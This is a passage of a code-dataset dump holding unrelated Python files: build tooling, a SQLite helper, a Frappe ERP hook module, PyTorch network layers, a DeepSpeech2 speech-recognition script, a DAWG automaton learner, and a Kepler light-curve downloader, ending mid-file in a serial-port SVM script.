[self.m.vars.skia_dir.join('bin', 'fetch-gn')])\n self._run('gn gen', ['gn', 'gen', self.out_dir, '--args=' + gn_args])\n self._run('ninja', ['ninja', '-C', self.out_dir])\n","sub_path":"infra/bots/recipe_modules/flavor/gn_android_flavor.py","file_name":"gn_android_flavor.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"486490551","text":"\"\"\"Common functions for dealing with the database.\"\"\"\n\nimport sqlite3\n\nRAW_TABLE = \"raw\"\nRAW_ID = \"raw_id\"\n\n\ndef connect(path: str) -> sqlite3.Connection:\n \"\"\"Connect to an SQLite database.\"\"\"\n cxn = sqlite3.connect(path)\n\n cxn.execute(\"PRAGMA page_size = {}\".format(2 ** 16))\n cxn.execute(\"PRAGMA busy_timeout = 10000\")\n cxn.execute(\"PRAGMA journal_mode = WAL\")\n cxn.row_factory = sqlite3.Row\n return cxn\n\n\ndef select_raw(\n cxn: sqlite3.Connection, limit: int = 0, offset: int = 0\n) -> sqlite3.Cursor:\n \"\"\"Get raw records.\"\"\"\n clause = f\"LIMIT {limit}\" if limit else \"\"\n clause += f\" OFFSET {offset}\" if offset else \"\"\n return cxn.execute(f\"SELECT * FROM {RAW_TABLE} {clause};\")\n","sub_path":"vertnet/pylib/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"352792420","text":"import frappe\nfrom frappe import _, msgprint, db, get_list, delete_doc, get_doc\nfrom frappe.utils import get_url_to_form\n\n\n@frappe.whitelist()\ndef payment_on_submit(self, method):\n\tpo_payments(self, method)\n\n@frappe.whitelist()\ndef pi_on_submit(self, method):\n\tcreate_part_tool(self, method)\n\n@frappe.whitelist()\ndef pi_on_cancel(self, method):\n\tcancel_part_tool(self, method)\n\t\ndef create_part_tool(self, method):\n\tparts = []\n\tfor row in self.items:\n\t\tif row.item_group == \"Truck Part\":\n\t\t\tpart_tool = frappe.new_doc(\"Part Creation Tool\")\n\t\t\tpart_tool.truck_part = row.item_code\n\t\t\tpart_tool.part_company = row.part_company\n\t\t\tpart_tool.number_of_parts = int(row.qty)\n\t\t\tpart_tool.warehouse = row.part_warehouse\n\t\t\tpart_tool.purchase_invoice = self.name\n\t\t\tpart_tool.supplier = self.supplier\n\t\t\tpart_tool.purchase_date = self.posting_date\n\t\t\tpart_tool.purchase_rate = row.rate\n\t\t\tpart_tool.save()\n\t\t\tdb.commit()\n\t\t\tlink = get_url_to_form(\"Part Creation Tool\", part_tool.name)\n\t\t\tparts.append(\"
{1}\".format(link.replace('localhost', 'localhost:8081'),row.item_code))\n\t\t\t\n\tif parts:\n\t\tmsgprint(_(\"Part Creation Tool updated for parts '%s'. Please submit the document to create parts.\"%(\",\".join(parts))))\n\n\ndef cancel_part_tool(self, method):\n\tresult = get_list(\"Part Creation Tool\", filters={'purchase_invoice': self.name}, fields='name')\n\t\t\t\t\n\tfor row in result:\n\t\tdelete_doc(\"Part Creation Tool\", row.name)\n\t\t\t\n#Update PO payments on Submit\ndef po_payments(self, method):\n\tfor row in self.references:\n\t\tif row.reference_doctype == \"Purchase Order\":\n\t\t\ttarget_po = get_doc(\"Purchase Order\", row.reference_name)\n\t\t\t\n\t\t\ttarget_po.append(\"payments\", {\n\t\t\t\t\"reference_date\": self.reference_date,\n\t\t\t\t\"mode_of_payment\": self.mode_of_payment,\n\t\t\t\t\"reference_no\": self.reference_no,\n\t\t\t\t\"paid_amount\" : row.allocated_amount,\n\t\t\t\t\"payment_entry\" : self.name,\n\t\t\t\t\"difference_amount\" : self.difference_amount\n\t\t\t})\n\t\ttarget_po.save()\n\t\tdb.commit()","sub_path":"transport/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"533548077","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nimport numpy as np\nfrom all.environments import State\n\nclass ListNetwork(nn.Module):\n '''\n Wraps a network such that States can be given as input.\n '''\n\n def __init__(self, model, out):\n super().__init__()\n self.model = model\n self.out = list(out)\n self.device = next(model.parameters()).device\n\n def forward(self, state):\n return self.model(state.features.float()) * state.mask.float().unsqueeze(-1)\n\nclass ListToList(nn.Module):\n '''\n Wraps a network such that States can be given as inputs, and are received as output.\n '''\n\n def __init__(self, model):\n super().__init__()\n self.model = model\n self.device = next(model.parameters()).device\n\n def forward(self, state):\n return State(self.model(state.features.float()), state.mask, state.info)\n\nclass Aggregation(nn.Module):\n '''len()\n Aggregation layer for the Dueling architecture.\n\n https://arxiv.org/abs/1511.06581\n This layer computes a Q function by combining\n an estimate of V with an estimate of the advantage.\n The advantage is normalized by substracting the average\n advantage so that we can propertly\n '''\n\n def forward(self, value, advantages):\n return value + advantages - torch.mean(advantages, dim=1, keepdim=True)\n\n\nclass Dueling(nn.Module):\n '''\n Implementation of the head for the Dueling architecture.\n\n https://arxiv.org/abs/1511.06581\n This module computes a Q function by computing\n an estimate of V, and estimate of the advantage,\n and combining them with a special Aggregation layer.\n '''\n\n def __init__(self, value_model, advantage_model):\n super(Dueling, self).__init__()\n self.value_model = value_model\n self.advantage_model = advantage_model\n self.aggregation = Aggregation()\n\n def forward(self, features):\n value = self.value_model(features)\n advantages = self.advantage_model(features)\n return self.aggregation(value, advantages)\n\n\nclass Flatten(nn.Module):\n def forward(self, x):\n return x.view(x.size()[0], -1)\n\n\nclass NoisyLinear(nn.Linear):\n '''\n Implementation of Linear layer for NoisyNets\n\n https://arxiv.org/abs/1706.10295\n NoisyNets are a replacement for epsilon greedy exploration.\n Gaussian noise is added to the weights of the output layer, resulting in\n a stochastic policy. Exploration is implicitly learned at a per-state\n and per-action level, resulting in smarter exploration.\n '''\n\n def __init__(self, in_features, out_features, sigma_init=0.017, bias=True):\n super(NoisyLinear, self).__init__(in_features, out_features, bias=bias)\n self.sigma_weight = nn.Parameter(torch.Tensor(\n out_features, in_features).fill_(sigma_init))\n self.register_buffer(\n \"epsilon_weight\", torch.zeros(out_features, in_features))\n if bias:\n self.sigma_bias = nn.Parameter(\n torch.Tensor(out_features).fill_(sigma_init))\n self.register_buffer(\"epsilon_bias\", torch.zeros(out_features))\n self.reset_parameters()\n\n def reset_parameters(self):\n std = np.sqrt(3 / self.in_features)\n nn.init.uniform_(self.weight, -std, std)\n nn.init.uniform_(self.bias, -std, std)\n\n def forward(self, x):\n bias = self.bias\n\n if not self.training:\n return F.linear(x, self.weight, bias)\n\n torch.randn(self.epsilon_weight.size(), out=self.epsilon_weight)\n if self.bias is not None:\n torch.randn(self.epsilon_bias.size(), out=self.epsilon_bias)\n bias = bias + self.sigma_bias * self.epsilon_bias\n return F.linear(x, self.weight + self.sigma_weight * self.epsilon_weight, bias)\n\n\nclass Linear0(nn.Linear):\n def reset_parameters(self):\n nn.init.constant_(self.weight, 0.)\n if self.bias is not None:\n nn.init.constant_(self.bias, 0.)\n\n\n__all__ = [\"Aggregation\", \"Dueling\", \"Flatten\", \"NoisyLinear\", \"Linear0\"]\n","sub_path":"all/layers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"119284137","text":"import torch\nimport numpy as np\nimport sys\nimport librosa\nimport argparse\nimport time\nimport pyaudio\n\nimport ailia\n\"\"\"import original modules\"\"\"\nsys.path.append('../../util') \nfrom model_utils import check_and_download_models\n\n# ======================\n# Parameters\n# ======================\nMODEL_LISTS = ['an4_pretrained_v2', 'librispeech_pretrained_v2', 'ted_pretrained_v2']\n\nDEFAULT_MODEL = 'librispeech_pretrained_v2'\n\nWEIGHT_PATH = 'librispeech_pretrained_v2.onnx'\nMODEL_PATH = 'librispeech_pretrained_v2.onnx.prototxt'\nREMOTE_PATH = 'https://storage.googleapis.com/ailia-models/deepspeech2/'\n\nWAV_PATH = './1221-135766-0000.wav'\nSAVE_TEXT_PATH = 'output.txt'\n\nSAMPLING_RATE = 16000\nWIN_LENGTH = int(SAMPLING_RATE * 0.02)\nHOP_LENGTH = int(SAMPLING_RATE * 0.01)\n\nLABELS = list('_\\'ABCDEFGHIJKLMNOPQRSTUVWXYZ ')\nint_to_char = dict([(i, c) for (i, c) in enumerate(LABELS)])\nBRANK_LABEL_INDEX = 0\n\n#BeamCTCDecoder parameter\nLM_PATH = '3-gram.pruned.3e-7.arpa'\nALPHA=1.97\nBETA=4.36 \nCUTOFF_TOP_N=40\nCUTOFF_PROB=1.0\nNUM_PROCESS=1\nBEAM_WIDTH=128\n\n#pyaudio\nCHUNK = 1024\nFORMAT = pyaudio.paInt16 \nCHANNELS = 1 \nRECODING_SAMPING_RATE = 48000 \nTHRESHOLD = 0.02\n\n# ======================\n# Arguemnt Parser Config\n# ======================\nparser = argparse.ArgumentParser(\n description='deepspeech2'\n)\nparser.add_argument(\n '-i', '--input', metavar='WAV',\n default=WAV_PATH,\n help='The input wav path.'\n)\nparser.add_argument(\n '-s', '--savepath', metavar='SAVE_TEXT_PATH',\n default=SAVE_TEXT_PATH,\n help='Save path for the output text.'\n)\nparser.add_argument(\n '-b', '--benchmark',\n action='store_true',\n help='Running the inference on the same input 5 times ' +\n 'to measure execution performance. (Cannot be used in video mode)'\n)\nparser.add_argument(\n '-V',\n action='store_true',\n help='use microphone input'\n)\nparser.add_argument(\n '-d', '--beamdecode',\n action='store_true',\n help='use beam decoder'\n)\nparser.add_argument(\n '-a', '--arch', metavar='WEIGHT',\n default=DEFAULT_MODEL, choices=MODEL_LISTS,\n help='model lists: ' + ' | '.join(MODEL_LISTS)\n)\nargs = parser.parse_args()\n\n# ======================\n# Utils\n# ======================\ndef create_spectrogram(wav):\n stft = librosa.stft(wav, n_fft=WIN_LENGTH,\n win_length=WIN_LENGTH, hop_length=HOP_LENGTH,\n window='hamming')\n stft, _ = librosa.magphase(stft)\n spectrogram = np.log1p(stft)\n spec_length = np.array(([stft.shape[1]-1]))\n\n mean = spectrogram.mean()\n std = spectrogram.std()\n spectrogram -= mean\n spectrogram /= std\n\n spectrogram = np.log1p(spectrogram)\n spectrogram = spectrogram[np.newaxis, np.newaxis, :, :]\n\n return (spectrogram, spec_length)\n\n\ndef record_microphone_input():\n print('Ready...')\n time.sleep(1)\n p = pyaudio.PyAudio()\n\n stream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RECODING_SAMPING_RATE,\n input=True,\n frames_per_buffer=CHUNK)\n\n #time.sleep(1)\n print(\"Please speak something\")\n\n frames = []\n count_uv = 0\n\n stream.start_stream()\n while True:\n data = np.frombuffer(stream.read(CHUNK), dtype=np.int16) / 32768.0\n if data.max() > THRESHOLD:\n frames.extend(data)\n count_uv = 0\n elif len(frames) > 0:\n count_uv += 1\n if count_uv > 48:\n break\n frames.extend(data)\n \n\n #print(\"Translating\")\n\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n wav = np.array(frames)\n return librosa.resample(wav, RECODING_SAMPING_RATE, SAMPLING_RATE)\n\n\ndef decode(sequence, size=None):\n sequence = np.argmax(sequence, -1)\n \n text = ''\n size = int(size[0]) if size is not None else len(sequence)\n for i in range(size):\n char = int_to_char[sequence[i]]\n if char != int_to_char[BRANK_LABEL_INDEX]:\n if i != 0 and char == int_to_char[sequence[i - 1]]:\n pass\n else:\n text += char\n return text.lower()\n\n\n#言語モデルを使用したデコード\ndef beam_ctc_decode(sequence, size=None, decoder=None):\n out, scores, offsets, seq_len = decoder.decode(sequence, size)\n\n results = []\n for b, batch in enumerate(out):\n utterances = []\n for p, utt in enumerate(batch):\n size = seq_len[0][p]\n if size > 0:\n transcript = ''.join(map(lambda x: int_to_char[x.item()], utt[0:size]))\n else:\n transcript = ''\n utterances.append(transcript)\n\n return utterances[0].lower()\n\n\n# ======================\n# Main functions\n# ======================\ndef wavfile_input_recognition():\n if args.beamdecode:\n try:\n from ctcdecode import CTCBeamDecoder\n except ImportError:\n raise ImportError(\"BeamCTCDecoder requires paddledecoder package.\")\n\n decoder = CTCBeamDecoder(LABELS, LM_PATH, ALPHA, BETA, CUTOFF_TOP_N, CUTOFF_PROB, BEAM_WIDTH,\n NUM_PROCESS, BRANK_LABEL_INDEX)\n\n wav = librosa.load(args.input, sr=SAMPLING_RATE)[0]\n spectrogram = create_spectrogram(wav)\n\n # net initialize\n env_id = ailia.get_gpu_environment_id()\n print(f'env_id: {env_id}')\n net = ailia.Net(MODEL_PATH, WEIGHT_PATH, env_id=env_id)\n net.set_input_shape(spectrogram[0].shape)\n\n # inference\n print('Start inference...')\n if args.benchmark:\n print('BENCHMARK mode')\n for c in range(5):\n start = int(round(time.time() * 1000))\n preds_ailia, output_length = net.predict(spectrogram)\n end = int(round(time.time() * 1000))\n print(\"\\tailia processing time {} ms\".format(end-start))\n else:\n #Deep Speech output: output_probability, output_length\n preds_ailia, output_length = net.predict(spectrogram)\n\n #実装上、1度torch.Tensorに変換\n if args.beamdecode:\n text = beam_ctc_decode(torch.from_numpy(preds_ailia), torch.from_numpy(output_length), decoder)\n else:\n text = decode(preds_ailia[0], output_length)\n\n with open(args.savepath, 'w', encoding='utf-8') as f:\n f.write(text)\n print(f'predict sentence:\\n{text}')\n print('Script finished successfully.')\n\n\n# ======================\n# microphone input mode\n# ======================\ndef microphone_input_recognition():\n env_id = ailia.get_gpu_environment_id()\n print(f'env_id: {env_id}')\n\n if args.beamdecode:\n try:\n from ctcdecode import CTCBeamDecoder\n except ImportError:\n raise ImportError(\"BeamCTCDecoder requires paddledecoder package.\")\n\n decoder = CTCBeamDecoder(LABELS, LM_PATH, ALPHA, BETA, CUTOFF_TOP_N, CUTOFF_PROB, BEAM_WIDTH,\n NUM_PROCESS, BRANK_LABEL_INDEX)\n\n while True:\n wav = record_microphone_input()\n spectrogram = create_spectrogram(wav)\n\n # net initialize\n net = ailia.Net(MODEL_PATH, WEIGHT_PATH, env_id=env_id)\n net.set_input_shape(spectrogram[0].shape)\n\n # inference\n print('Translating...')\n #Deep Speech output: output_probability, output_length\n preds_ailia, output_length = net.predict(spectrogram)\n\n if args.beamdecode:\n text = beam_ctc_decode(torch.from_numpy(preds_ailia), torch.from_numpy(output_length), decoder)\n else:\n text = decode(preds_ailia[0], output_length)\n\n print(f'predict sentence:\\n{text}\\n')\n time.sleep(1)\n\n\ndef main():\n global WEIGHT_PATH, MODEL_PATH\n if args.arch != WEIGHT_PATH:\n WEIGHT_PATH = args.arch + '.onnx'\n MODEL_PATH = WEIGHT_PATH + '.prototxt'\n \n check_and_download_models(WEIGHT_PATH, MODEL_PATH, REMOTE_PATH)\n check_and_download_models(LM_PATH, LM_PATH, REMOTE_PATH)\n \n #マイク入力モード\n if args.V:\n try:\n microphone_input_recognition()\n except KeyboardInterrupt:\n print('script finished successfully.')\n\n #音声ファイル入力モード\n else:\n wavfile_input_recognition()\n\n\nif __name__==\"__main__\":\n main()","sub_path":"audio_processing/deepspeech2/deepspeech2.py","file_name":"deepspeech2.py","file_ext":"py","file_size_in_byte":8228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"139216144","text":"from copy import deepcopy as copy\nfrom utils import convert_afn_to_afd\nimport AFD\nimport AFN\nimport time\n\n\ndef _ordenar_potencia(potencia):\n potencia_ordenada = {}\n for estado in potencia:\n for aresta in potencia[estado]:\n potencia_ordenada[(estado, aresta)] = potencia[estado][aresta]\n potencia_ordenada = {k: v for k, v in sorted(potencia_ordenada.items(), key=lambda item: item[1], reverse=True)}\n return potencia_ordenada\n\n\ndef _calcular_potencia(dawg):\n potencia = {}\n estados_calculados = []\n\n for estado in dawg['states']:\n if estado != '{e}':\n for aresta in dawg['states'][estado]:\n if '{e}' in dawg['states'][estado][aresta]:\n potencia[estado] = {'{e}': 1}\n estados_calculados.append(estado)\n\n while len(estados_calculados) > 0:\n for estado_calculado in estados_calculados.copy():\n for estado in dawg['states']:\n if estado != '{e}':\n for aresta in dawg['states'][estado]:\n if estado_calculado in dawg['states'][estado][aresta]:\n\n if estado in potencia:\n potencia[estado].update({estado_calculado: sum(potencia[estado_calculado].values())})\n else:\n potencia[estado] = {estado_calculado: sum(potencia[estado_calculado].values())}\n\n estados_calculados.append(estado)\n\n estados_calculados.remove(estado_calculado)\n\n return _ordenar_potencia(potencia)\n\n\ndef _extend(dawg, S_minus):\n potencias = _calcular_potencia(dawg)\n dawg_copy = copy(dawg) # para testar sem modificar diretamente\n\n for aresta in potencias:\n for simbolo in dawg['alphabet']:\n if simbolo in dawg['states'][aresta[0]]:\n if aresta[1] not in dawg['states'][aresta[0]][simbolo]:\n dawg_copy['states'][aresta[0]][simbolo].append(aresta[1])\n else:\n dawg_copy['states'][aresta[0]][simbolo] = [aresta[1]]\n\n if dawg_copy != dawg:\n for string_invalida in S_minus:\n if AFN.testar_string(dawg_copy, string_invalida)[0]:\n break\n else:\n dawg = copy(dawg_copy) # so executa se nao encontrar string invalida\n\n dawg_copy = copy(dawg) # para testar sem modificar diretamente\n\n return dawg\n\n\ndef _build(dawg, estados):\n rotulo_do_estado = ';'.join(estados)\n dawg['states'][rotulo_do_estado] = {}\n novos_estados = []\n\n alfabeto_local = {}\n for estado in estados:\n simbolo = estado[0]\n if simbolo not in alfabeto_local:\n alfabeto_local[simbolo] = []\n alfabeto_local[simbolo].append(estado)\n\n for simbolo in alfabeto_local:\n dawg['states'][rotulo_do_estado][simbolo] = []\n proximos_estados = []\n\n for estado in alfabeto_local[simbolo]:\n proximo_estado = estado[1:]\n if len(proximo_estado) > 0: # como o estado vazio não é utilizado para descobrir novos estados, ele nao vai para o rotulo\n proximos_estados.append(proximo_estado)\n else:\n dawg['states'][rotulo_do_estado][simbolo].append('{e}') # com o vazio e adicionado a transicao para o estado final\n\n if len(proximos_estados) > 0:\n dawg['states'][rotulo_do_estado][simbolo].append(';'.join(proximos_estados))\n novos_estados.append(proximos_estados)\n\n return novos_estados\n\n\ndef contruir_dawg(S_plus, S_minus, alphabet):\n # a utilização de ';' ao inves de ',' se da para nao ter conflito na hora da conversao para AFD\n dawg = {'initial': ';'.join(S_plus), 'final': ['{e}'], 'alphabet': alphabet, 'states': {'{e}': {}}}\n novos_estados = [dawg['initial'].split(';')]\n\n while len(novos_estados) > 0:\n for novo_estado in novos_estados.copy():\n novos_estados += _build(dawg, novo_estado)\n\n novos_estados.remove(novo_estado)\n\n dawg_e = _extend(dawg, S_minus)\n\n return dawg_e\n\n\ndef _open_dawg_arquivo(path):\n f = open(path, \"r\")\n lines = f.readlines()\n S_plus = []\n S_minus = []\n alphabet = []\n\n for x in lines:\n if x == '&':\n break\n string, classe = x.split('\\t')\n if '+' in classe:\n S_plus.append(string)\n else:\n S_minus.append(string)\n\n alphabet += list(string)\n f.close()\n\n alphabet = list(set(alphabet))\n\n return [S_plus, S_minus, alphabet]\n\n\ndef _open_teste_dawg_arquivo(path):\n f = open(path, \"r\")\n lines = f.readlines()\n S_plus = []\n S_minus = []\n\n for x in lines:\n if 'Classification' in x:\n continue\n classe, string = x.split(',')\n string = string.replace('\\n', '')\n if 'non-amyloid' in classe:\n S_minus.append(string)\n else:\n S_plus.append(string)\n f.close()\n\n return [S_plus, S_minus]\n\n\ndef contruir_dawg_arquivo(path):\n S_plus, S_minus, alphabet = _open_dawg_arquivo(path)\n\n dawg = contruir_dawg(S_plus, S_minus, alphabet)\n\n return dawg\n\n\ndef testar_dawg_arquivo(dawg, path):\n [S_plus, S_minus] = _open_teste_dawg_arquivo(path)\n acertos = 0\n total = len(S_plus) + len(S_minus)\n\n start = time.time()\n for string in S_minus:\n reposta, _ = AFN.testar_string(dawg, string)\n if not reposta:\n acertos += 1\n\n for string in S_plus:\n reposta, _ = AFN.testar_string(dawg, string)\n if reposta:\n acertos += 1\n\n end = time.time()\n tempo = end - start\n\n porcentagem = acertos/total * 100\n print('Porcentagem de acertos: {:.2f}%'.format(porcentagem))\n print('media de tempo: {}s'.format(tempo/total))\n\n\ndef testar_dawg_arquivo_convertendo_AFD(dawg, path):\n [S_plus, S_minus] = _open_teste_dawg_arquivo(path)\n acertos = 0\n total = len(S_plus) + len(S_minus)\n\n print('convertendo...')\n dawg = convert_afn_to_afd(dawg)\n\n start = time.time()\n\n for string in S_minus:\n reposta = AFD.testar_string(dawg, string)\n if not reposta:\n acertos += 1\n\n for string in S_plus:\n reposta = AFN.testar_string(dawg, string)\n if reposta:\n acertos += 1\n\n end = time.time()\n tempo = end - start\n\n porcentagem = acertos/total * 100\n print('Porcentagem de acertos convertendo: {:.2f}%'.format(porcentagem))\n print('media de tempo com AFD: {}s'.format(tempo/total))\n","sub_path":"DAWG.py","file_name":"DAWG.py","file_ext":"py","file_size_in_byte":6574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"241519747","text":"import boto3\nimport time\nimport os\nimport json\n\nimport multiprocessing\nimport subprocess\nimport string\nfrom pathlib import Path\nimport logging\nlogger = logging.getLogger('usgs_boundary')\nimport requests\n\n\ndef run(task):\n task.run()\n return task\n\nclass Command(object):\n def __init__(self, args):\n self.args = args\n\n def __repr__(self):\n return f'{self.args}'\n\nclass Task(object):\n def __init__(self, bucket, key, resolution=1000):\n self.bucket = bucket\n self.key = key\n self.url = f'https://s3-us-west-2.amazonaws.com/{self.bucket}/{self.key}ept.json'\n self.resolution = resolution\n self.stats = None\n self.wkt = None\n self.error = None\n\n def geometry(self):\n self.wkt = self.stats['boundary']['boundary']\n\n\n def run (self):\n try:\n self.count()\n self.info()\n\n self.geometry()\n except (AttributeError, KeyError, json.decoder.JSONDecodeError):\n pass\n\n def count (self):\n r = requests.get(self.url)\n self.num_points = int(r.json()['points'])\n\n def info (self):\n cargs = ['pdal','info','--all',\n '--driver','readers.ept',\n f'--readers.ept.resolution={self.resolution}',\n f'--readers.ept.threads=6',\n f'--filters.hexbin.edge_size=1000',\n f'--filters.hexbin.threshold=1',\n self.url]\n logger.debug(\" \".join(cargs))\n p = subprocess.Popen(cargs, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n encoding='utf8')\n ret = p.communicate()\n if p.returncode != 0:\n error = ret[1]\n logger.error(cargs)\n logger.error(error)\n self.error = {\"args\":cargs, \"error\": error}\n raise AttributeError(error)\n self.stats = json.loads(ret[0])\n\n\n def __repr__(self):\n return f'{self.bucket} {self.key}'\n\nclass Process(object):\n\n def __init__(self):\n self.tasks = []\n self.results = []\n\n def put(self, task):\n self.tasks.append(task)\n\n def do(self, count = multiprocessing.cpu_count()):\n pool = multiprocessing.Pool(processes=count)\n self.results = (pool.map(run, self.tasks))\n# import pdb;pdb.set_trace()\n\n","sub_path":"action/usgs_boundary/proqueue.py","file_name":"proqueue.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"650165511","text":"#!/usr/bin/env python3\n\n'''Output is the same set of columns but sorted alphabetically (ignoring case)'''\n\nimport sys\n\ndef sorter(t):\n tmp = \"\".join(t).lower()\n return tmp\n\ndef main():\n s = [l.strip() for l in sys.stdin]\n grid = []\n for t in s:\n a = []\n for l in t:\n a.append(l)\n grid.append(a)\n\n a = []\n for i in range(len(grid[0])):\n letter = \"\"\n for n in grid:\n letter += n[i]\n a.append(list(letter))\n\n new = sorted(a, key=sorter)\n\n b = []\n for j in range(len(new[0])):\n letter = \"\"\n for p in new:\n letter += p[j]\n b.append(list(letter))\n\n for word in b:\n print(\"\".join(word))\n\nif __name__ == '__main__':\n main()\n","sub_path":"Sort_sideways.py","file_name":"Sort_sideways.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"206469026","text":"from __future__ import division, print_function\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport wget\nimport kplr\nimport os\nfrom astropy.io import fits\n\n\ndef download(target, downloadFolderPath=\"downloadedData\"):\n \"\"\"Download Kepler data for a target.\n Args:\n target (float, int, or str): The target to download.\n Can be a KOI number (float), KIC (int), or Kepler planet name (str).\n downloadFolderPath(str): The relative path to the folder where the target's \n light curve fits files will be downloaded.\n \"\"\"\n\n client = kplr.API()\n \n # Find the target.\n if isinstance(target, str):\n target = client.planet(target)\n #period=target.koi_period\n KIC = target.kepid\n\n elif isinstance(target, int):\n KIC = target\n target = client.star(target)\n\n elif isinstance(target, float):\n target = client.koi(target)\n #period=target.koi_period\n KIC=target.kepid\n\n KICname = str(KIC).zfill(9)\n KICshort=KICname[0:4]\n\n #folder to hold the downloaded light curves\n dataDirectory = os.getcwd()+\"{0}/KIC_{1}\".format(downloadFolderPath.split(\".\")[1],KIC)\n print(\"Downloading light curves to {0}.\".format(dataDirectory))\n\n if not os.path.exists(dataDirectory):\n os.makedirs(dataDirectory)\n\n ftpfolder='http://archive.stsci.edu/pub/kepler/lightcurves//'+KICshort+'/'+KICname+'/'\n #print ftpfolder\n\n fileList = wget.download(ftpfolder)\n\n with open(fileList, 'r') as listOfLinks:\n lol=listOfLinks.read()\n\n lol = lol.split('href=\"kplr')[1:-2]\n\n fileNames = []\n\n for linkString in lol:\n linkString = linkString.split('\">')[1]\n linkString = linkString.split('<')[0]\n fileNames.append(linkString)\n\n #list to hold names of long cadence light curve fits files\n n_lcs = 0\n for fileToDownload in fileNames:\n targetFile = ftpfolder+fileToDownload\n #print targetFile\n lcName = dataDirectory+'/'+fileToDownload\n #download fits file if necessary\n if not os.path.exists(lcName):\n wget.download(targetFile, lcName)\n n_lcs += 1\n \n print(\"{0} light curve files downloaded.\".format(n_lcs))\n #delete download list\n os.system('rm ./download.wget')\n\n return\n\n#next functions to write:\n\ndef readIn(KIC, dataFolder, cadence=\"both\", plot=True):\n \"\"\"Having downloaded the Kepler light curves for a target (see above), read in the\n time, flux, fluxerr columns. \n Args:\n KIC (int): KIC number for this star\n dataFolder (str): The relative path to the folder where the target's \n light curve fits are.\n cadence (str): Read in only short-cadence data, only long-cadence data, or both?\n plot (bool): Plot the data, or no?\n \"\"\"\n\n dataDirectory = os.getcwd() + dataFolder.split(\".\")[1]\n\n lcs = []\n\n for lcName in os.listdir(dataDirectory):\n if cadence == \"short\":\n if lcName[-8:] == \"slc.fits\":\n lcs.append(lcName)\n\n elif cadence == \"long\":\n if lcName[-8:] == \"llc.fits\":\n lcs.append(lcName)\n else:\n lcs.append(lcName)\n\n #sort light curve fits files by date\n dates = []\n for lc in lcs:\n dates.append(int(lc[14:-9]))\n\n dates = np.array(dates)\n dateIdxs = np.argsort(dates)\n\n lcs = np.array(lcs)[dateIdxs]\n \n # Loop over the datasets and read in the data.\n time, flux, ferr, quality = [], [], [], []\n print(len(lcs),' lightcurves')\n for lc in lcs:\n f = fits.open(dataDirectory+'/'+lc)\n\n # The lightcurve data are in the first FITS HDU.\n hdu_data = f[1].data\n\n time.append(hdu_data[\"time\"])\n flux.append(hdu_data[\"sap_flux\"])\n ferr.append(hdu_data[\"sap_flux_err\"])\n quality.append(hdu_data[\"sap_quality\"])\n\n firstObs=0\n lastObs=len(time)-1\n \n if plot==True:\n firstPlot=plt.gca()\n firstPlot.plot(np.hstack(time[firstObs:lastObs+1]),(np.hstack(flux[firstObs:lastObs+1])/np.nanmean(np.hstack(flux[firstObs:lastObs+1])))-1,'k.',alpha=0.25)\n plt.show()\n\n return time, flux, ferr, quality\n\n\n\n","sub_path":"getKeplerData.py","file_name":"getKeplerData.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"102049813","text":"import os\nimport time\nfrom datetime import datetime\nimport sys\nimport random\nimport uuid\nimport pprint\nimport numpy as np\nfrom sklearn import svm\nimport serial\nimport serial.tools.list_ports\nfrom PyQt5.QtGui import *\nimport PyQt5.QtWidgets\nfrom PyQt5.QtCore import Qt, QTimer, QPoint\nfrom PyQt5.QtWidgets import *\n\nimport pickle\nfrom sklearn.externals import joblib\n\nimport matplotlib\nmatplotlib.use('Qt5Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nfrom matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nard = serial.Serial()\nard.baudrate = 115200\n\ndef standarizeData():\n X = []\n y = []\n try:\n os.chdir(os.getcwd()+'\\\\data0')\n for path, subdir, files in os.walk('.'):\n for directory in subdir: \n for file in os.listdir(os.getcwd() + '\\\\'+directory):\n y.append(directory)\n filename = os.getcwd()+ '\\\\'+directory + '\\\\' + file\n f = open(filename, 'r')\n data = f.read()#[1:-1]\n data = data[1:-1]\n data = [float(s) for s in data.split(',')]\n X.append(data)\n f.close()\n \"\"\"os.chdir(os.getcwd()+'\\\\..\\\\data90')\n for path, subdir, files in os.walk('.'):\n for directory in subdir: \n for file in os.listdir(os.getcwd() + '\\\\'+directory):\n y.append(directory)\n #print(directory)\n filename = os.getcwd()+ '\\\\'+directory + '\\\\' + file\n f = open(filename, 'r')\n data = f.read()#[1:-1]\n data = data[1:-1]\n data = [float(s) for s in data.split(',')]\n X.append(data)\n f.close()\n os.chdir(os.getcwd()+'\\\\..\\\\data180')\n for path, subdir, files in os.walk('.'):\n for directory in subdir: \n for file in os.listdir(os.getcwd() + '\\\\'+directory):\n y.append(directory)\n #print(directory)\n filename = os.getcwd()+ '\\\\'+directory + '\\\\' + file\n f = open(filename, 'r')\n data = 